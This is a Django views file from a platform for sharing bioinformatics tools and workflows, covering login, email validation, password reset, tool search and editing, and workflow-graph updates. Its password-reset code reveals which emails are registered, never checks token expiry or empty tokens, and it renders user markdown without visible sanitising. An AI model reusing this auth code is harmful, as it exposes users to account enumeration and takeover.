obc_user = OBC_user(user=user, email_validated=bool(settings.DEBUG), email_validation_token=uuid_token)
obc_user.save()
return success()
@has_data
def reset_password_email(request, **kwargs):
if not 'reset_password_email' in kwargs:
return fail('Please enter an email')
email = kwargs['reset_password_email']
try:
obc_user = OBC_user.objects.get(user__email=email)
except ObjectDoesNotExist:
obc_user = None
if not obc_user:
return fail('This email does not belong to any user') # Isn't this a breach of privacy?
# reset_password_email_body
# Save token
token = create_uuid_token()
obc_user.password_reset_token = token
obc_user.password_reset_timestamp = now()
obc_user.save()
# #Send email with SMTPLIB
# try:
# send_mail(
# from_ = g['EMAIL'],
# to = email,
# subject = '[{server}] Reset your password'.format(server=g['SERVER']),
# body = reset_password_email_body(token, port=request_port_to_url(request))
# )
# except smtplib.SMTPRecipientsRefused:
# return fail('Could not send an email to: {}'.format(email))
# except Exception as e:
# pass # FIX ME
# With Django send_mail
try:
send_mail(
'[{server}] Reset your password'.format(server=g['SERVER']), # subject
reset_password_email_body(token, port=request_port_to_url(request)), # body message
g['EMAIL'], # from
[email], # to
)
except Exception as e:
return fail('Could not send email to {email}. Please contact {ADMIN}'.format(email=email, ADMIN=g['ADMIN']))
return success()
@has_data
def password_reset(request, **kwargs):
if not 'password_reset_password' in kwargs:
return fail('password is required')
password_reset_password = kwargs['password_reset_password']
if not 'password_reset_confirm_password' in kwargs:
return fail('confirm password is required')
password_reset_confirm_password = kwargs['password_reset_confirm_password']
if password_reset_password != password_reset_confirm_password:
return fail('Confirm password does not match password')
check_password_success, check_password_message = check_password(password_reset_password)
if not check_password_success:
return fail(check_password_message)
password_reset_token = kwargs['password_reset_token'] # This should be always present in kwargs
#Change the password
obc_user = OBC_user.objects.get(password_reset_token=password_reset_token)
user = obc_user.user
user.set_password(password_reset_password) # https://docs.djangoproject.com/en/2.1/topics/auth/default/
user.save()
#Invalidate token
obc_user.password_reset_token = None
obc_user.save()
return success()
@has_data
def send_validation_email(request, **kwargs):
'''
url: send_validation_email/
'''
if request.user.is_anonymous:
return fail('Error 8912'); # This should never happen
try:
obc_user = OBC_user.objects.get(user=request.user)
except ObjectDoesNotExist:
return fail('Error 8711'); # This should never happen
email = request.user.email
suc, error_message, uuid_token = send_validation_email_inner(request, email)
if not suc:
return fail(error_message)
#Set the validation token
obc_user.email_validation_token = uuid_token
obc_user.save()
#print ('Validation token:', uuid_token)
ret = {
'email': request.user.email
}
return success(ret)
@has_data
def login(request, **kwargs):
'''
View url: 'login/'
'''
if not 'login_username' in kwargs:
return fail('username is required')
login_username = kwargs['login_username']
if not 'login_password' in kwargs:
return fail('password is required')
login_password = kwargs['login_password']
user = authenticate(username=login_username, password=login_password)
if user is None:
return fail('Invalid username or password')
django_login(request, user)
obc_user = OBC_user.objects.get(user=user)
#print ('LOGIN: user_is_validated', obc_user.email_validated)
# Since we logged in the csrf token has changed.
ret = {
'username': login_username,
'csrf_token': get_token(request),
'user_is_validated': obc_user.email_validated,
'profile_clients': get_execution_clients_angular(request),
}
return success(ret)
def logout(request):
'''
View url: 'logout/'
This is NOT called by AJAX
'''
django_logout(request)
return redirect('/platform/')
#def user_data_get(request):
# '''
# View url: user_data_get
# GET THE DATA OF THE LOGGED-IN USER
# It does not have the @has_data decorator because it has.. no data
# '''
#
# user = request.user
# obc_user = OBC_user.objects.get(user=user)
# ret = {
# 'user_first_name': obc_user.first_name,
# 'user_last_name': obc_user.last_name,
# 'user_email': user.email,
# 'user_website': obc_user.website,
# 'user_public_info': obc_user.public_info,
# }
#
# return success(ret)
#@has_data
#def user_data_set(request, **kwargs):
# '''
# Deprecated
# '''
# user = request.user
# obc_user = OBC_user.objects.get(user=user)
#
# obc_user.first_name = None_if_empty_or_nonexisting(kwargs, 'user_first_name')
# obc_user.last_name = None_if_empty_or_nonexisting(kwargs, 'user_last_name')
# obc_user.website = None_if_empty_or_nonexisting(kwargs, 'user_website')
# obc_user.public_info = None_if_empty_or_nonexisting(kwargs, 'user_public_info')
#
# obc_user.save()
#
# return success()
@has_data
def tools_search_1(request, **kwargs):
'''
Get tool counts
NOT CURRENTLY USED!
'''
queries = []
ret = {
'tools_search_tools_number': Tool.objects.count(),
'workflows_search_tools_number': Workflow.objects.count(),
}
return success(ret)
def tools_search_2(tools_search_name, tools_search_version, tools_search_edit):
'''
This is triggered when there is a key-change on the main-search
'''
Qs = []
if tools_search_name:
Q1 = Q(name__icontains=tools_search_name)
Q2 = Q(obc_user__user__username__icontains=tools_search_name)
Qs.append(Q1 | Q2)
if tools_search_version:
Qs.append(Q(version__icontains=tools_search_version))
if tools_search_edit:
Qs.append(Q(edit = int(tools_search_edit)))
# This applies an AND operator. https://docs.djangoproject.com/en/2.2/topics/db/queries/#complex-lookups-with-q-objects
# For the order_by part see issue #120
results = Tool.objects.filter(*Qs).order_by('created_at')
# { id : 'ajson1', parent : '#', text : 'KARAPIPERIM', state: { opened: true} }
# Build JS TREE structure
tools_search_jstree = []
for x in results:
to_add = {
'data': {'name': x.name, 'version': x.version, 'edit': x.edit},
'text': tool_node_jstree(x), # tool_text_jstree(x) + (' <span class="red lighten-3">DRAFT</span>' if x.draft else '') + jstree_icon_html('tools'),
'id': tool_id_jstree(x, g['SEARCH_TOOL_TREE_ID']),
'parent': tool_id_jstree(x.forked_from, g['SEARCH_TOOL_TREE_ID']) if x.forked_from else '#',
'state': { 'opened': True},
}
tools_search_jstree.append(to_add)
ret = {
'tools_search_tools_number' : results.count(),
#'tools_search_list': [{'name': x.name, 'version': x.version, 'edit': x.edit} for x in results], # We do not need a list, we need a tree!
'tools_search_jstree' : tools_search_jstree,
}
return ret
def workflows_search_2(workflows_search_name, workflows_search_edit):
'''
Called by all_search_2
'''
Qs = []
#workflows_search_name = kwargs.get('workflows_search_name', '')
if workflows_search_name:
Q1 = Q(name__icontains=workflows_search_name)
Q2 = Q(obc_user__user__username__icontains=workflows_search_name)
Qs.append(Q1 | Q2)
#workflows_search_edit = kwargs.get('workflows_search_edit', '')
if workflows_search_edit:
Qs.append(Q(edit = int(workflows_search_edit)))
# For the order_by part see issue #120
results = Workflow.objects.filter(*Qs).order_by('created_at')
# Build JS TREE structure
workflows_search_jstree = []
for x in results:
to_add = {
'data': {'name': x.name, 'edit': x.edit},
'text': workflow_node_jstree(x),
'id': workflow_id_jstree(x, g['SEARCH_WORKFLOW_TREE_ID']),
'parent': workflow_id_jstree(x.forked_from, g['SEARCH_WORKFLOW_TREE_ID']) if x.forked_from else '#',
'state': { 'opened': True},
}
workflows_search_jstree.append(to_add)
ret = {
'workflows_search_tools_number' : results.count(),
'workflows_search_jstree' : workflows_search_jstree,
}
return ret
@has_data
def tools_search_3(request, **kwargs):
'''
Triggered when a tool is clicked on the tool-search-jstree
'''
tool_name = kwargs.get('tool_name', '')
tool_version = kwargs.get('tool_version', '')
tool_edit = int(kwargs.get('tool_edit', -1))
tool = Tool.objects.get(name__iexact=tool_name, version__iexact=tool_version, edit=tool_edit)
#Get the dependencies of this tool and build a JSTREE
tool_dependencies_jstree = []
for dependency in tool.dependencies.all():
dependency_js_tree = tool_build_dependencies_jstree(tool_get_dependencies_internal(dependency, include_as_root=True))
tool_dependencies_jstree.extend(dependency_js_tree)
#Get the dependencies of this tool AND the variables and build a JSTREE
#FIXME: Duplicate code
tool_variables_jstree = []
for dependency in tool.dependencies.all():
variables_js_tree = tool_build_dependencies_jstree(tool_get_dependencies_internal(dependency, include_as_root=True), add_variables=True)
tool_variables_jstree.extend(variables_js_tree)
#print ('LOGGG DEPENDENIES + VARIABLES')
#print (tool_variables_jstree)
#print (simplejson.dumps(tool_variables_jstree, indent=4))
#Get the variables of this tool
tool_variables = []
for variable in tool.variables.all():
tool_variables.append({'name': variable.name, 'value': variable.value, 'description': variable.description})
# Get obc_user
if request.user.is_anonymous:
obc_user = None
else:
obc_user = OBC_user.objects.get(user=request.user)
#Is it voted?
if obc_user:
try:
v = UpDownToolVote.objects.get(obc_user=obc_user, tool=tool)
except ObjectDoesNotExist as e:
# It is not voted
tool_voted = {'up': False, 'down': False}
else:
# It is noted
tool_voted = {'up': v.upvote, 'down': not v.upvote}
else:
tool_voted = {'up': False, 'down': False}
ret = {
'website': tool.website,
'description': tool.description,
'description_html': tool.description_html,
'username': tool.obc_user.user.username,
'created_at': datetime_to_str(tool.created_at),
'forked_from': tool_to_json(tool.forked_from),
'changes': tool.changes,
'tool_keywords': [keyword.keyword for keyword in tool.keywords.all()],
'dependencies_jstree': tool_dependencies_jstree,
'variables_js_tree': tool_variables_jstree,
'variables': tool_variables,
'tool_os_choices': OS_types.get_angular_model([x.os_choices for x in tool.os_choices.all()]),
'installation_commands': tool.installation_commands,
'validation_commands': tool.validation_commands,
'validation_status': tool.last_validation.validation_status if tool.last_validation else 'Unvalidated',
# Show stdout, stderr and error code when the tool is clicked on the tool-search-jstree
'stdout' : tool.last_validation.stdout if tool.last_validation else None,
'stderr' : tool.last_validation.stderr if tool.last_validation else None,
'errcode' : tool.last_validation.errcode if tool.last_validation else None,
'validation_created_at' : datetime_to_str(tool.last_validation.created_at) if tool.last_validation else None,
'tool_pk': tool.pk, # Used in comments
'tool_thread': qa_create_thread(tool.comment, obc_user), # Tool comment thread. This is a list
'tool_score': tool.upvotes - tool.downvotes,
'tool_voted': tool_voted,
'tool_comment_id': tool.comment.pk, # Used to create a permalink to the comments
'tool_comment_title': tool.comment.title,
'tool_comment_created_at': datetime_to_str(tool.comment.created_at),
'tool_comment_username': tool.comment.obc_user.user.username,
'draft': tool.draft,
}
#print ('LOGGG DEPENDENCIES + VARIABLES')
#print (simplejson.dumps(tool_variables_jstree, indent=4))
return success(ret)
@has_data
def tool_get_dependencies(request, **kwargs):
'''
Get the dependencies of this tool
Called when a stop event (from dnd) happens from search JSTREE to the dependencies JSTREE
OR from a stop event from search jstree to cytoscape graph
what_to_do == 1: drag and drop FROM SEARCH TREE TO DEPENDENCY TREE
what_to_do == 2: dran and drop FROM SEARCH TREE TO CYTOSCAPE CYWORKFLOW DIV
'''
tool_name = kwargs.get('tool_name', '')
tool_version = kwargs.get('tool_version', '')
tool_edit = int(kwargs.get('tool_edit', -1))
what_to_do = kwargs.get('what_to_do', None)
if not what_to_do:
return fail('Error 9122')
try:
what_to_do = int(what_to_do)
except ValueError as e:
return fail('Error 9123')
tool = Tool.objects.get(name=tool_name, version=tool_version, edit=tool_edit)
#Get the dependencies of this tool
tool_dependencies = tool_get_dependencies_internal(tool, include_as_root=True)
tool_dependencies_jstree = tool_build_dependencies_jstree(tool_dependencies, add_installation_commands=what_to_do==2)
#Get the dependencies + variables of this tool
tool_variables_jstree = tool_build_dependencies_jstree(tool_dependencies, add_variables=True)
#print ('LOGGG DEPENDENCIES')
#print (simplejson.dumps(tool_dependencies_jstree, indent=4))
#print ('LOGGG DEPENDENCIES + VARIABLES')
#print (simplejson.dumps(tool_variables_jstree, indent=4))
# There is $scope.tools_dep_jstree_model and $scope.tools_var_jstree_model
ret = {
'dependencies_jstree': tool_dependencies_jstree,
'variables_jstree': tool_variables_jstree,
}
return success(ret)
def validate_toast_button():
'''
This button should be similar with the one generated from angular
'''
return '<button class="waves-effect waves-light btn red lighten-3 black-text" onclick="window.OBCUI.send_validation_mail()">Validate</button>'
@has_data
def tools_add(request, **kwargs):
'''
Add a new tool
tool add tool save tool . Create tool
* names and version is searched case insensitive
'''
if request.user.is_anonymous: # Server should always check..
return fail('Please login to create new tools')
if not user_is_validated(request):
return fail('Please validate your email to create new tools ' + validate_toast_button())
obc_user = OBC_user.objects.get(user=request.user)
tool_website = kwargs.get('tool_website', '')
#if not tool_website:
# return fail('Website cannot be empty') # Website CAN be empty
if tool_website:
if not valid_url(tool_website):
return fail('Website is not a valid URL')
tool_description = kwargs.get('tool_description', '')
if not tool_description:
return fail('Description cannot be empty')
tool_description_html = markdown(tool_description)
tools_search_name = kwargs.get('tools_search_name', '')
if not tools_search_name:
return fail('Invalid name')
tools_search_version = kwargs.get('tools_search_version', '')
if not tools_search_version:
return fail('Invalid version')
tool_edit_state = kwargs.get('tool_edit_state', '')
if not type(tool_edit_state) is bool:
return fail('Error 8715')
upvoted = False
downvoted = False
tool_forked_from = None
tool_changes = None
if tool_edit_state:
# We are editing this tool!
# Get the edit of the tool
tools_search_edit = kwargs.get('tools_search_edit', '')
if not tools_search_edit:
return fail('Invalid tool edit number. Error 8712')
try:
tools_search_edit = int(tools_search_edit)
except ValueError as e:
return fail('Invalid tool edit number. Error 8713')
except Exception as e:
return fail('Invalid tool edit number. Error 8714')
# Delete the previous object!
try:
tool = Tool.objects.get(name=tools_search_name, version=tools_search_version, edit=tools_search_edit)
except ObjectDoesNotExist as e:
return fail('Error 8716')
# Check that the user who created this tool is the one who deletes it!
if tool.obc_user != obc_user:
return fail('Error 8717') # This is strange.. The user who edits this tool is not the one who created it???
# Store a reference to the comment
comment = tool.comment
# Store upvotes/downvotes
upvotes = tool.upvotes
downvotes = tool.downvotes
# Store vote objects
votes = UpDownToolVote.objects.filter(tool=tool)
# Disassociate from this tool (this is allowed because null=true)
for vote in votes:
if vote.obc_user == obc_user:
upvoted = vote.upvote
downvoted = not upvoted
vote.tool = None
vote.save()
# Get the tools that are forks of this tool
tool_forks = Tool.objects.filter(forked_from=tool)
# Temporary set that these tools are not forked from any tool
for tool_fork in tool_forks:
tool_fork.forked_from = None
tool_fork.save()
# Get the tool that this tool is forked from
tool_forked_from = tool.forked_from
# Get the tools that depend from this tool
tools_depending_from_me = tool.dependencies_related.all()
tools_depending_from_me_list = list(tools_depending_from_me) # We need to add a reference to these object. Otherwise it will be cleared after we delete tool
# Get the created at. It needs to be sorted according to this, otherwise the jstree becomes messy
tool_created_at = tool.created_at
# Get the workflows that use this tool
workflows_using_this_tool = Workflow.objects.filter(tools__in = [tool])
# Remove this tool from these workflows
for workflow_using_this_tool in workflows_using_this_tool:
workflow_using_this_tool.tools.remove(tool)
workflow_using_this_tool.save()
# Delete it!
tool.delete()
else:
upvotes = 0
downvotes = 0
#os_type Update
tool_os_choices = kwargs.get('tool_os_choices',[])
if not tool_os_choices:
return fail('Please select at least one operating system')
#print ('Operating Systems:')
#print (tool_os_choices)
# If we are editing this tool, set the same edit number
# Otherwise get the maximum edit
if tool_edit_state:
next_edit = tools_search_edit
else:
#Get the maximum edit
tool_all = Tool.objects.filter(name__iexact=tools_search_name, version__iexact=tools_search_version) # https://docs.djangoproject.com/en/dev/ref/models/querysets/#std:fieldlookup-iexact
if not tool_all.exists():
next_edit = 1
else:
max_edit = tool_all.aggregate(Max('edit'))
next_edit = max_edit['edit__max'] + 1
# Get forked from and edit summary
tool_forked_from_info = kwargs.get('tool_forked_from', None)
if tool_forked_from_info:
tool_forked_from = Tool.objects.get(name=tool_forked_from_info['name'], version=tool_forked_from_info['version'], edit=int(tool_forked_from_info['edit']))
tool_changes = kwargs.get('tool_changes', '')
if not tool_changes:
return fail('Edit summary cannot be empty')
else:
pass # Do nothing
#Installation/Validation commands
tool_installation_commands = kwargs['tool_installation_commands']
tool_validation_commands = kwargs['tool_validation_commands']
#Dependencies
tool_dependencies = kwargs['tool_dependencies']
# FIXME! What if a dependency is deleted???
tool_dependencies_objects = [Tool.objects.get(name=t['name'], version=t['version'], edit=int(t['edit'])) for t in tool_dependencies]
#Variables
tool_variables = kwargs['tool_variables']
tool_variables = [x for x in tool_variables if x['name'] and x['value'] and x['description']] # Filter out empty fields
# Check that variables do not have the same name
for variable_name, variable_name_counter in Counter([x['name'] for x in tool_variables]).items():
if variable_name_counter>1:
return fail('Two variables cannot have the same name!')
#Create new tool
new_tool = Tool(
obc_user= obc_user,
name = tools_search_name,
version=tools_search_version,
edit=next_edit,
website = tool_website,
description = tool_description,
description_html = tool_description_html,
forked_from = tool_forked_from,
changes = tool_changes,
installation_commands=tool_installation_commands,
validation_commands=tool_validation_commands,
upvotes = upvotes,
downvotes = downvotes,
draft = True, # By defaut all new tools are draft
last_validation=None,
)
#Save it
new_tool.save()
if tool_edit_state:
# Preserve the created at date. We have to do that AFTER the save! https://stackoverflow.com/questions/7499767/temporarily-disable-auto-now-auto-now-add
# If we do not preserve the created at, then the jstree becomes messy.
new_tool.created_at = tool_created_at
new_tool.save()
#Add dependencies
if tool_dependencies_objects:
new_tool.dependencies.add(*tool_dependencies_objects)
new_tool.save()
#Add Variables
if tool_variables:
variable_objects = []
for variable in tool_variables:
variable_object = Variables(name=variable['name'], value=variable['value'], description=variable['description'], tool=new_tool)
variable_object.save()
variable_objects.append(variable_object)
new_tool.variables.add(*variable_objects)
new_tool.save()
#Add os type
for tool_os_choice in tool_os_choices:
OS_types_obj, created = OS_types.objects.get_or_create(os_choices=tool_os_choice['value'])
new_tool.os_choices.add(OS_types_obj)
new_tool.save()
#Add keywords
keywords = [Keyword.objects.get_or_create(keyword=keyword)[0] for keyword in kwargs['tool_keywords']]
new_tool.keywords.add(*keywords)
new_tool.save()
if tool_edit_state:
# Add the votes from the previous edit
for vote in votes:
vote.tool = new_tool
vote.save()
# Add the tools that were forked from this tool (that was deleted before) to the new tool
for tool_fork in tool_forks:
tool_fork.forked_from = new_tool
tool_fork.save()
# To the tools depending from me, add this tool to dependencies!
for tool_depending_from_me in tools_depending_from_me_list:
tool_depending_from_me.dependencies.add(new_tool)
#print ('Add {} as a dependency to {}'.format(new_tool, tool_depending_from_me))
tool_depending_from_me.save()
# Add to the workflows that were using this tool, the new tool
for workflow_using_this_tool in workflows_using_this_tool:
workflow_using_this_tool.tools.add(new_tool)
workflow_using_this_tool.save()
# Update the json graph of the workflows using this tool
WJ = WorkflowJSON()
WJ.update_tool(new_tool)
else:
#Add an empty comment. This will be the root comment for the QA thread
comment = Comment(
obc_user = OBC_user.objects.get(user=request.user),
comment = '',
comment_html = '',
title = markdown('Discussion on Tool: t/{}/{}/{}'.format(tools_search_name, tools_search_version, next_edit)),
parent = None,
upvotes = 0,
downvotes = 0,
)
comment.save()
new_tool.comment = comment
new_tool.save()
ret = {
'description_html': tool_description_html,
'edit': next_edit,
'created_at': datetime_to_str(new_tool.created_at),
'tool_pk': new_tool.pk, # Used in comments
'tool_thread': qa_create_thread(new_tool.comment, obc_user), # Tool comment thread
'score': upvotes-downvotes,
'voted': {'up': upvoted, 'down': downvoted},
}
return success(ret)
class WorkflowJSON:
'''
Basically a function collection for dealing with the workflow json object
'''
def update_workflow(self, workflow):
'''
workflow is a database Workflow opbject
'''
self.workflow = workflow
self.key = workflow_id_cytoscape(self.workflow, None, None)
self.graph = simplejson.loads(self.workflow.workflow)
self.all_ids = {node['data']['id'] for node in self.graph['elements']['nodes']} # All node ids
self.workflows_using_me = Workflow.objects.filter(workflows__in = [self.workflow])
self.belongto, self.workflow_nodes = self.__build_workflow_belongto(self.graph)
self.__update_workflow()
def update_tool(self, tool):
'''
tool is a database Tool object
'''
self.tool = tool
self.graph = self.__create_cytoscape_graph_from_tool_dependencies(self.tool)
self.all_ids = {node['data']['id'] for node in self.graph['elements']['nodes']} # All node ids
self.workflows_using_me = Workflow.objects.filter(tools__in = [self.tool])
self.key = tool_id_cytoscape(self.tool)
self.__update_tool()
def __iter_workflows(self, graph):
'''
'''
for element in graph['elements']['nodes']:
if element['data']['type'] == 'workflow':
yield element
def __build_workflow_belongto(self, graph):
'''
Create dictionaries:
self.belongto
Keys: workflow tuple (name, edit)
Value: The workflow element where this workflow belongs to
self.workflow_nodes
Keys: workflow tuple
Value: The workflow element
'''
all_workflows = list(self.__iter_workflows(graph))
workflow_nodes = {workflow_element['data']['id'] : workflow_element for workflow_element in all_workflows}
belongto = {}
for workflow_element in all_workflows:
workflow_key = workflow_element['data']['id']
if workflow_element['data']['belongto']:
belongto[workflow_key] = workflow_nodes[workflow_id_cytoscape(workflow_element['data']['belongto'], None, None)]
else:
belongto[workflow_key] = None
return belongto, workflow_nodes
def __build_edges_dict(self, graph):
'''
Create a dictionary 's': source, 't': target
Keys are node ids
Values are a set containing all the nodes that there is an edge
'''
ret = {
's' : defaultdict(set),
't' : defaultdict(set),
}
for edge in graph['elements']['edges']:
ret['s'][edge['data']['source']].add(edge['data']['target'])
ret['t'][edge['data']['target']].add(edge['data']['source'])
return ret
def __tool_dependencies(self, tool_node, all_nodes, edges):
'''
Edge A --> B: Tool A has dependency B . Or else, A depends from B. Or else first install B then A
Return a set of all tool ids that belong to the dependencies of a tool (tool_node)
tool_node: The tool node in a workflow cy
all_nodes: A list of all nodes of a workflow cy
edges: The object returned from self.__build_edges_dict
'''
ret = set()
#print ('tool_node:', tool_node)
#print ('Edge set:', edges)
def recurse(rec_tool_node):
tool_id = rec_tool_node['data']['id']
for target_id in edges['s'][tool_id]:
target_node = all_nodes[target_id]
if not target_node['data']['type'] == 'tool':
continue
# This is a tool. There exist an edge rec_tool_node --> target_node. This means that rec_tool_node dependes from target_node
if not target_id in ret:
ret.add(target_id)
recurse(target_node)
#print ('set 2:', ret)
recurse(tool_node)
ret.add(tool_node['data']['id'])
return ret
def __create_cytoscape_graph_from_tool_dependencies(self, tool):
'''
tool is a database object.
Return a workflow cytoscape worflow. It does not contain the workflow node!
tool_depending_from_me=None
'''
all_ids = set()
workflow = {
'elements': {
'nodes': [],
'edges': [],
}
}
this_tool_cytoscape_node = tool_node_cytoscape(tool)
workflow['elements']['nodes'].append(this_tool_cytoscape_node)
# FIXME !!! DUPLICATE CODE
root_tool_all_dependencies = tool_get_dependencies_internal(tool, include_as_root=False)
for root_tool_all_dependency in root_tool_all_dependencies:
# For each dependency create a cytoscape node
cytoscape_node = tool_node_cytoscape(root_tool_all_dependency['dependency'], tool_depending_from_me=root_tool_all_dependency['dependant'])
if not cytoscape_node['data']['id'] in all_ids: # An id should exist only once in the graph... FIXME!! all_ids is always empty!
workflow['elements']['nodes'].append(cytoscape_node)
# Connect this tool with its dependent tool node
if root_tool_all_dependency['dependant']:
workflow['elements']['edges'].append(edge_cytoscape(tool_node_cytoscape(root_tool_all_dependency['dependant']), cytoscape_node))
else:
# This tool does not have a dependant!
# This is a dependency of the root tool!
workflow['elements']['edges'].append(edge_cytoscape(this_tool_cytoscape_node, cytoscape_node))
return workflow
def __node_belongs_to_a_workflow(self, node, workflow, workflow_nodes):
'''
Recursive
'''
if not node: # We are running this for ALL workflow nodes. Including the root workflow that its belongto to is None
return False
# We reached the root
if not node['data']['belongto']:
return False
workflow_key = workflow['data']['id']
node_belongto_key = workflow_id_cytoscape(node['data']['belongto'], None, None)
#print ('Checking: {} == {}'.format(workflow_key, node_belongto_key))
if workflow_key == node_belongto_key:
return True
# This node does not belong to this workflow. Perhaps the node-->belongto workflow belongs to this workflow
return self.__node_belongs_to_a_workflow(workflow_nodes[node_belongto_key], workflow, workflow_nodes)
def __nodes_belonging_to_a_workflow(self, graph, workflow_node, workflow_nodes):
'''
Returns a set
'''
ret = {element['data']['id'] for element in graph['elements']['nodes']
if self.__node_belongs_to_a_workflow(element, workflow_node, workflow_nodes)}
ret.add(workflow_node['data']['id']) # Add the workflow node as well
return ret
def __remove_nodes_edges(self, graph, node_ids_to_remove, node_ids_to_add):
'''
CRITICAL: A mistake here could produce a corrupted graph..
'''
# Determine which edges should be removed
edge_ids_to_remove = set()
for edge in graph['elements']['edges']:
source_id = edge['data']['source']
target_id = edge['data']['target']
edge_id = edge['data']['id']
source_id_in = source_id in node_ids_to_remove
target_id_in = target_id in node_ids_to_remove
# This is an edge from inside to inside. Remove it
if source_id_in and target_id_in:
edge_ids_to_remove.add(edge_id)
continue
# This is an edge from inside to outside
# Also, on the new workflow, the inside node does not exist!
# Se we are removing the edge. This might render the workflow useless, but not corrupted!
if source_id_in and not target_id_in:
if not source_id in node_ids_to_add:
edge_ids_to_remove.add(edge_id)
continue
# Same as before but the edge is from outside to inside
if not source_id_in and target_id_in:
if not target_id in node_ids_to_add:
edge_ids_to_remove.add(edge_id)
# Remove edges
graph['elements']['edges'] = [edge for edge in graph['elements']['edges'] if not edge['data']['id'] in edge_ids_to_remove]
# Remove nodes
graph['elements']['nodes'] = [node for node in graph['elements']['nodes'] if not node['data']['id'] in node_ids_to_remove]
def __consistency_check_graph_model(self, graph, workflow):
'''
Whenever we update the graph of a workflow, we have to make sure that all tools/workflows that this graph has, do exist in the model
We also need to check the opposite: All tools/workflows that exist in the model also exist in the graph
'''
workflow_using_me_tools = workflow.tools.all()
tools_found = {str(t): [False, t] for t in workflow_using_me_tools}
workflow_using_me_workflow = workflow.workflows.all()
workflows_found = {str(w): [False, w] for w in workflow_using_me_workflow}
for node in graph['elements']['nodes']:
if node['data']['type'] == 'tool':
if node['data']['disconnected']:
continue
# This is a tool does it exist in the model?
this_tool = Tool.objects.get(name=node['data']['name'], version=node['data']['version'], edit=node['data']['edit'])
if not workflow_using_me_tools.filter(pk=this_tool.pk).exists():
# This tools does not exist in the model but exists on the graph. Add it!
workflow.tools.add(this_tool)
else:
tools_found[str(this_tool)][0] = True
if node['data']['type'] == 'workflow':
if node['data']['disconnected']:
continue
if not node['data']['belongto']:
continue # Do not connect the root workflow
this_workflow = Workflow.objects.get(name=node['data']['name'], edit=node['data']['edit'])
if not workflow_using_me_workflow.filter(pk=this_workflow.pk).exists():
# This workflow does not exist in the model but exists on the graph. Add it!
workflow.workflows.add(this_workflow)
else:
workflows_found[str(this_workflow)][0] = True
workflow.save()
# Is there any tool that exist on the model, but it does not exist on the graph?
for tool_id, (exists, this_tool) in tools_found.items():
if not exists:
# This tool exists on the model but not in the graph. REMOVE IT!
workflow.tools.remove(this_tool)
# Is there any workflow that exists on the model, but it does not exist on the graph?
for workflow_id, (exists, this_workflow) in workflows_found.items():
if not exists:
# Remove this workflow from the model
workflow.workflows.remove(this_workflow)
workflow.save()
def __update_workflow_node(self, workflow_node, workflow_object):
'''
Update a workflow node according to the data from the workflow_object
'''
workflow_node['data']['draft'] = workflow_object.draft
def __update_workflow(self,):
'''
update this workflow
'''
self.__update_workflow_node(self.workflow_nodes[self.key], self.workflow)
self.workflow.workflow = simplejson.dumps(self.graph)
self.workflow.save()
# Update also the workflows that are using me
for workflow_using_me in self.workflows_using_me:
#print ('workflow using me:', workflow_using_me)
graph = simplejson.loads(workflow_using_me.workflow)
belongto, workflow_nodes = self.__build_workflow_belongto(graph)
# Get the workflow that the workflow that we want to update belongs to
belongto_root = belongto[self.key]
#print (' belongto_root: ', belongto_root)
# Get the workflow node that we want to update
workflow_node_root = workflow_nodes[self.key]
#print (' Workflow node root:', workflow_node_root)
# This is a set of all the nodes that this sub-workflow has
workflow_nodes_set = self.__nodes_belonging_to_a_workflow(graph, workflow_node_root, workflow_nodes)
#print (' workflow nodes set:', workflow_nodes_set)
# Remove these nodes (and edges connected to them) from the graph
self.__remove_nodes_edges(graph, workflow_nodes_set, self.all_ids)
#print ('The graph after removing of nodes edges:')
#print (simplejson.dumps(graph, indent=4))
# Add the edges of this graph
graph['elements']['edges'].extend(self.graph['elements']['edges'])
# Add the nodes of this graph
# Make sure that any main step becomes sub_main
nodes_to_add = self.graph['elements']['nodes']
for node in nodes_to_add:
if node['data']['type'] == 'step':
if node['data']['main']:
node['data']['main'] = False
node['data']['sub_main'] = True
graph['elements']['nodes'].extend(nodes_to_add)
# Update the belongto info on the root workflow node. We cannot use the belongto and workflow_nodes any more
workflow_node_root = [node for node in graph['elements']['nodes'] if node['data']['id'] == self.key][0]
workflow_node_root['data']['belongto'] = {'name': belongto_root['data']['name'] , 'edit': belongto_root['data']['edit']}
# Update the root workflow node
self.__update_workflow_node(workflow_node_root, self.workflow)
# Save the graph
workflow_using_me.workflow = simplejson.dumps(graph)
workflow_using_me.save()
# Check graph <--> model consistency
self.__consistency_check_graph_model(graph, workflow_using_me)
def __update_tool(self,):
'''
'''
# Update all the workflows who are using this tool
for workflow_using_me in self.workflows_using_me:
#print ('The graph of this tool:')
#print (simplejson.dumps(self.graph, indent=4))
#print ('Workflow using me:', workflow_using_me.name, workflow_using_me.edit)
graph = simplejson.loads(workflow_using_me.workflow)
#print (' The workflow graph:')
#print (simplejson.dumps(graph, indent=4))
all_nodes = {node['data']['id']:node for node in graph['elements']['nodes']}
belongto = {node['data']['id']: node['data']['belongto'] for node in graph['elements']['nodes']}
edges = self.__build_edges_dict(graph)
#print (' All nodes:')
#print (simplejson.dumps(all_nodes, indent=4))
#print (' Belongto:')
#print (simplejson.dumps(belongto, indent=4))
#print (' self.key:', self.key)
tool_node = all_nodes[self.key]
tool_node_belongto = belongto[self.key]
# Use download_tool() does the same task. The problem is that it works directly with the UI.
# We want to construct a cytoscape graph from the database object
# Get a set of the node ids that depend from this tool
tool_dependencies = self.__tool_dependencies(tool_node, all_nodes, edges)
#print (' Nodes to delete:')
#print (tool_dependencies)
# Remove these nodes (and edges connected to them) from the graph
self.__remove_nodes_edges(graph, tool_dependencies, self.all_ids)
#print (' Graph After Deletion of nodes and edges:')
#print (simplejson.dumps(graph, indent=4))
# Add the edges of the graph
#print (' Edges to add:')
#print (simplejson.dumps(self.graph['elements']['edges'], indent=4))
graph['elements']['edges'].extend(self.graph['elements']['edges'])
# Add the nodes of this graph
# Make sure that they have the right belongto info
nodes_to_add = self.graph['elements']['nodes']
for node_to_add in nodes_to_add:
node_to_add['data']['belongto'] = tool_node_belongto
#print (' Nodes to add:')
#print (simplejson.dumps(nodes_to_add, indent=4))
graph['elements']['nodes'].extend(nodes_to_add)
#print (' Graph after adding new tool dependencies')
#print (simplejson.dumps(graph, indent=4))
# Save the graph
workflow_using_me.workflow = simplejson.dumps(graph)
workflow_using_me.save()
# Check graph <--> model consistency
self.__consistency_check_graph_model(graph, workflow_using_me)
@has_data
def ro_finalize_delete(request, **kwargs):
'''
Called from ro_finalize_delete/
if action is FINALIZE:
finalize a tool/workflow (from draft to no draft!)
if action is DELETE
DELETE a tool/workflow
ro: tool or workflow
'''
